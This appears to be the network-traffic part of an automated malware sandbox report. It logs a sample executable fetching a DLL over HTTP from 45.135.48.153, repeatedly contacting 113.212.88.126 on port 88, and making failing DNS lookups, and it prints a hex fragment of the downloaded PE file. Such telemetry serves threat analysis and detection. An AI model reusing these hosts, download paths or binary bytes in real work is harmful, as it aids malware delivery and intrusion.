Apr 19, 2022 16:45:41.192878962 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:43.499927998 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:43.789417028 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:43.789738894 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:44.085093021 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:44.085139036 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:44.085236073 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:46.390804052 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:46.680084944 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:46.680556059 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:46.975462914 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:46.975512981 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:46.975759983 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:49.235294104 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:49.524811029 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:49.525731087 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:49.823565006 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:49.823615074 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:49.823796034 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:52.094237089 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:52.383934975 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:52.384310007 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:52.679465055 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:52.679512024 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:52.679677010 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:54.913202047 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:55.204018116 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:55.204406023 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:55.500165939 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:55.500197887 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:55.500389099 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:57.799890041 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:58.089505911 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:58.089843035 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:45:58.385639906 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:58.385693073 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:45:58.386070967 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:00.673330069 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:00.962768078 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:00.963171959 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:01.258985996 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:01.259037971 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:01.259154081 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:03.501610994 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:03.791145086 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:03.791702032 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:04.087753057 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:04.087815046 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:04.088093042 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:06.408015013 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:06.697170019 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:06.699403048 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:07.007862091 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:07.007909060 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:07.007997990 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:09.332918882 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:09.622876883 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:09.673494101 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:09.923511982 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:09.923636913 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:09.963067055 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:10.260292053 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:10.260333061 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:10.260442972 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:13.846103907 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:13.846195936 CEST	49767	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:46:13.846312046 CEST	49768	80	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:14.134743929 CEST	80	49767	45.135.48.153	192.168.2.4
Apr 19, 2022 16:46:14.135184050 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:14.135211945 CEST	49767	80	192.168.2.4	45.135.48.153
Apr 19, 2022 16:46:14.135324001 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:14.139348030 CEST	80	49768	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:14.139475107 CEST	49768	80	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:14.434324026 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:14.434360981 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:14.434438944 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:16.486826897 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:16.776184082 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:16.776381016 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:17.073154926 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:17.073203087 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:17.073276997 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:19.128073931 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:19.417387962 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:19.420114040 CEST	49769	88	192.168.2.4	113.212.88.126
Apr 19, 2022 16:46:19.716344118 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:19.716377974 CEST	88	49769	113.212.88.126	192.168.2.4
Apr 19, 2022 16:46:19.716468096 CEST	49769	88	192.168.2.4	113.212.88.126

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 19, 2022 16:44:56.155854940 CEST	64277	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:44:56.174659014 CEST	53	64277	8.8.8.8	192.168.2.4
Apr 19, 2022 16:44:56.265227079 CEST	56076	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:44:56.281938076 CEST	53	56076	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:05.177890062 CEST	60647	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:05.196561098 CEST	53	60647	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:07.432835102 CEST	64909	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:07.451457024 CEST	53	64909	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:10.839622021 CEST	60381	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:10.856070042 CEST	53	60381	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:13.913959980 CEST	56509	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:13.930598974 CEST	53	56509	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:17.274804115 CEST	54069	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:17.293526888 CEST	53	54069	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:20.740560055 CEST	57747	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:20.759059906 CEST	53	57747	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:23.999439001 CEST	57594	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:24.016716957 CEST	53	57594	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:27.486226082 CEST	52472	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:27.504889965 CEST	53	52472	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:30.467737913 CEST	64825	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:30.485989094 CEST	53	64825	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:33.536175966 CEST	61081	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:33.554984093 CEST	53	61081	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:38.398217916 CEST	57890	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:38.416964054 CEST	53	57890	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:41.286073923 CEST	64259	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:41.308088064 CEST	53	64259	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:44.199177027 CEST	53916	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:44.216303110 CEST	53	53916	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:47.066828012 CEST	60790	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:47.085731983 CEST	53	60790	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:49.907247066 CEST	62708	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:49.923984051 CEST	53	62708	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:52.756869078 CEST	60946	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:52.775482893 CEST	53	60946	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:55.611782074 CEST	53483	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:55.630903959 CEST	53	53483	8.8.8.8	192.168.2.4
Apr 19, 2022 16:45:58.490938902 CEST	61780	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:45:58.509732008 CEST	53	61780	8.8.8.8	192.168.2.4
Apr 19, 2022 16:46:01.332612038 CEST	57567	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:46:01.349606991 CEST	53	57567	8.8.8.8	192.168.2.4
Apr 19, 2022 16:46:04.198034048 CEST	50661	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:46:04.216944933 CEST	53	50661	8.8.8.8	192.168.2.4
Apr 19, 2022 16:46:07.092950106 CEST	51110	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:46:07.109793901 CEST	53	51110	8.8.8.8	192.168.2.4
Apr 19, 2022 16:46:11.087100983 CEST	55179	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:46:11.103471994 CEST	53	55179	8.8.8.8	192.168.2.4
Apr 19, 2022 16:46:14.451319933 CEST	59510	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:46:14.469940901 CEST	53	59510	8.8.8.8	192.168.2.4
Apr 19, 2022 16:46:17.090600014 CEST	49320	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:46:17.107234001 CEST	53	49320	8.8.8.8	192.168.2.4
Apr 19, 2022 16:46:19.733562946 CEST	58863	53	192.168.2.4	8.8.8.8
Apr 19, 2022 16:46:19.751960039 CEST	53	58863	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 19, 2022 16:44:56.155854940 CEST	192.168.2.4	8.8.8.8	0x8c47	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:44:56.265227079 CEST	192.168.2.4	8.8.8.8	0x56ec	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:05.177890062 CEST	192.168.2.4	8.8.8.8	0xf7ec	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:07.432835102 CEST	192.168.2.4	8.8.8.8	0xd11a	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:10.839622021 CEST	192.168.2.4	8.8.8.8	0x8f46	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:13.913959980 CEST	192.168.2.4	8.8.8.8	0xc9d4	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:17.274804115 CEST	192.168.2.4	8.8.8.8	0xd04c	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:20.740560055 CEST	192.168.2.4	8.8.8.8	0x8729	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:23.999439001 CEST	192.168.2.4	8.8.8.8	0xb6bd	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:27.486226082 CEST	192.168.2.4	8.8.8.8	0x8f9	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:30.467737913 CEST	192.168.2.4	8.8.8.8	0x682e	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:33.536175966 CEST	192.168.2.4	8.8.8.8	0x8ba8	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:38.398217916 CEST	192.168.2.4	8.8.8.8	0x935d	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:41.286073923 CEST	192.168.2.4	8.8.8.8	0x537	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:44.199177027 CEST	192.168.2.4	8.8.8.8	0x1b71	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:47.066828012 CEST	192.168.2.4	8.8.8.8	0xd357	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:49.907247066 CEST	192.168.2.4	8.8.8.8	0x970b	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:52.756869078 CEST	192.168.2.4	8.8.8.8	0xc7ff	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:55.611782074 CEST	192.168.2.4	8.8.8.8	0x5578	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:58.490938902 CEST	192.168.2.4	8.8.8.8	0x2cff	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:46:01.332612038 CEST	192.168.2.4	8.8.8.8	0x763d	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:46:04.198034048 CEST	192.168.2.4	8.8.8.8	0x50ea	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:46:07.092950106 CEST	192.168.2.4	8.8.8.8	0x9912	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:46:11.087100983 CEST	192.168.2.4	8.8.8.8	0xfb46	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:46:14.451319933 CEST	192.168.2.4	8.8.8.8	0xbd16	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:46:17.090600014 CEST	192.168.2.4	8.8.8.8	0x7a52	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:46:19.733562946 CEST	192.168.2.4	8.8.8.8	0x9960	Standard query (0)	201.75.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 19, 2022 16:44:56.174659014 CEST	8.8.8.8	192.168.2.4	0x8c47	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:44:56.281938076 CEST	8.8.8.8	192.168.2.4	0x56ec	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:05.196561098 CEST	8.8.8.8	192.168.2.4	0xf7ec	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:07.451457024 CEST	8.8.8.8	192.168.2.4	0xd11a	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:10.856070042 CEST	8.8.8.8	192.168.2.4	0x8f46	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:13.930598974 CEST	8.8.8.8	192.168.2.4	0xc9d4	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:17.293526888 CEST	8.8.8.8	192.168.2.4	0xd04c	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:20.759059906 CEST	8.8.8.8	192.168.2.4	0x8729	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:24.016716957 CEST	8.8.8.8	192.168.2.4	0xb6bd	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:27.504889965 CEST	8.8.8.8	192.168.2.4	0x8f9	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:30.485989094 CEST	8.8.8.8	192.168.2.4	0x682e	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:33.554984093 CEST	8.8.8.8	192.168.2.4	0x8ba8	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:38.416964054 CEST	8.8.8.8	192.168.2.4	0x935d	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:41.308088064 CEST	8.8.8.8	192.168.2.4	0x537	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:44.216303110 CEST	8.8.8.8	192.168.2.4	0x1b71	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:47.085731983 CEST	8.8.8.8	192.168.2.4	0xd357	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:49.923984051 CEST	8.8.8.8	192.168.2.4	0x970b	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:52.775482893 CEST	8.8.8.8	192.168.2.4	0xc7ff	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:55.630903959 CEST	8.8.8.8	192.168.2.4	0x5578	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:45:58.509732008 CEST	8.8.8.8	192.168.2.4	0x2cff	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:46:01.349606991 CEST	8.8.8.8	192.168.2.4	0x763d	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:46:04.216944933 CEST	8.8.8.8	192.168.2.4	0x50ea	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:46:07.109793901 CEST	8.8.8.8	192.168.2.4	0x9912	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:46:11.103471994 CEST	8.8.8.8	192.168.2.4	0xfb46	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:46:14.469940901 CEST	8.8.8.8	192.168.2.4	0xbd16	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:46:17.107234001 CEST	8.8.8.8	192.168.2.4	0x7a52	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Apr 19, 2022 16:46:19.751960039 CEST	8.8.8.8	192.168.2.4	0x9960	Name error (3)	201.75.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)

HTTP Request Dependency Graph

45.135.48.153

113.212.88.126

113.212.88.126:88

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49758	45.135.48.153	80	C:\Users\user\Desktop\ywvz5i8kT9.exe

Timestamp	kBytes transferred	Direction	Data
Apr 19, 2022 16:44:26.306507111 CEST	1158	OUT	GET /Vv/1/install_wim_tweak.dll HTTP/1.1 Host: 45.135.48.153 Connection: Keep-Alive
Apr 19, 2022 16:44:26.602826118 CEST	1159	IN	HTTP/1.1 200 OK Content-Type: application/x-msdownload Last-Modified: Sat, 29 Aug 2015 02:15:52 GMT Accept-Ranges: bytes ETag: "0fcd5a00e2d01:0" Server: Microsoft-IIS/10.0 Date: Tue, 19 Apr 2022 14:44:26 GMT Content-Length: 45568 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf e8 da 55 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 6a 00 00 00 46 00 00 00 00 00 00 62 88 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 88 00 00 4f 00 00 00 00 a0 00 00 90 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 90 87 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 80 68 00 00 00 20 00 00 00 6a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 90 42 00 00 00 a0 00 00 00 44 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 88 00 00 00 00 00 00 48 00 00 00 02 00 05 00 20 37 00 00 b8 4f 00 00 01 00 00 00 01 00 00 06 d8 86 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 06 00 10 07 00 00 01 00 00 11 1f 0f 28 18 00 00 0a 7e 05 00 00 04 28 19 00 00 0a 28 1a 00 00 0a 02 1f 09 8d 31 00 00 01 25 d0 93 00 00 04 28 1b 00 00 0a 28 0f 00 00 06 80 0b 00 00 04 7e 0b 00 00 04 1f 3f 6f 1c 00 00 0a 2c 26 72 01 00 00 70 28 19 00 00 0a 1f 0b 28 18 00 00 0a 72 ea 03 00 70 28 19 00 00 0a 28 1a 00 00 0a 17 28 1d 00 00 0a 7e 0b 00 00 04 1f 63 6f 1c 00 00 0a 2c 61 7e 0b 00 00 04 1f 63 6f 1e 00 00 0a 28 1f 00 00 0a 2d 1d 7e 0b 00 00 04 1f 63 6f 1e 00 00 0a 72 66 04 00 70 28 20 00 00 0a 80 0a 00 00 04 2b 2c 1f 0f 28 18 00 00 0a 72 68 04 00 70 28 21 00 00 0a 1f 0b 28 18 00 00 0a 28 22 00 00 0a 72 66 04 00 70 28 20 00 00 0a 80 0a 00 00 04 28 1a 00 00 0a 7e 0b 00 00 04 1f 6f 6f 1c 00 00 0a 2c 4e 28 23 00 00 0a 28 24 00 00 0a 72 19 05 00 70 28 20 00 00 0a 80 09 00 00 04 1f 0b 28 18 00 00 0a 72 5b 05 00 70 28 21 00 00 0a 28 1a 00 00 0a 7e 02 00 00 04 72 81 05 00 70 72 a9 05 00 70 6f 25 00 00 0a 80 02 00 00 04 17 80 0c 00 00 04 7e 0b 00 00 04 1f 68 6f 1c 00 00 0a 2c 06 17 80 0f 00 00 04 7e 0b 00 00 04 1f 6f 6f 1c 00 00 0a 3a 6a 01 00 00 7e 0b 00 00 04 1f 70 6f 1c 00 00 0a 3a c8 00 00 00 1f 0f 28 18 00 00 0a 72 bb 05 00 70 28 21 00 00 0a 1f 0b 28 18 00 00 0a 28 22 00 00 0a 72 19 05 00 70 28 20 00 00 0a 80 09 00 00 04 7e 09 00 00 04 16 7e 09 00 00 04 6f 26 00 00 0a 72 19 05 00 70 28 26 00 00 0a 59 6f 27 00 00 0a 6f 26 00 00 0a 19 33 2b 72 5b 05 00 70 28 21 00 00 0a 7e 02 00 00 04 72 81 05 00 70 72 a9 05 00 70 6f 25 00 00 0a 80 02 00 00 04 17 80 0c 00 00 04 2b 3f 72 01 06 00 70 72 21 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELU"0jFb @ `OB H.texth j `.rsrcBDl@@.reloc@BDH 7O0(~((1%((~?o,&rp((rp(((~co,a~co(-~corfp( +,(rhp(!(("rfp( (~oo,N(#($rp( (r[p(!(~rprpo%~ho,~oo:j~po:(rp(!(("rp( ~~o&rp(&Yo'o&3+r[p(!~rprpo%+?rpr!
Apr 19, 2022 16:44:26.602885008 CEST	1160	IN	Data Raw: 06 00 70 7e 09 00 00 04 16 7e 09 00 00 04 6f 26 00 00 0a 72 19 05 00 70 28 26 00 00 0a 59 6f 27 00 00 0a 72 21 06 00 70 28 28 00 00 0a 28 29 00 00 0a 16 80 0c 00 00 04 28 1a 00 00 0a 38 91 00 00 00 7e 0b 00 00 04 1f 70 6f 1e 00 00 0a 72 19 05 00 Data Ascii: p~~o&rp(&Yo'r!p((()(8~porp( (~poo&3+r[p(!~rprpo%++rpr!p~por!p((()(~(,(~(*-&
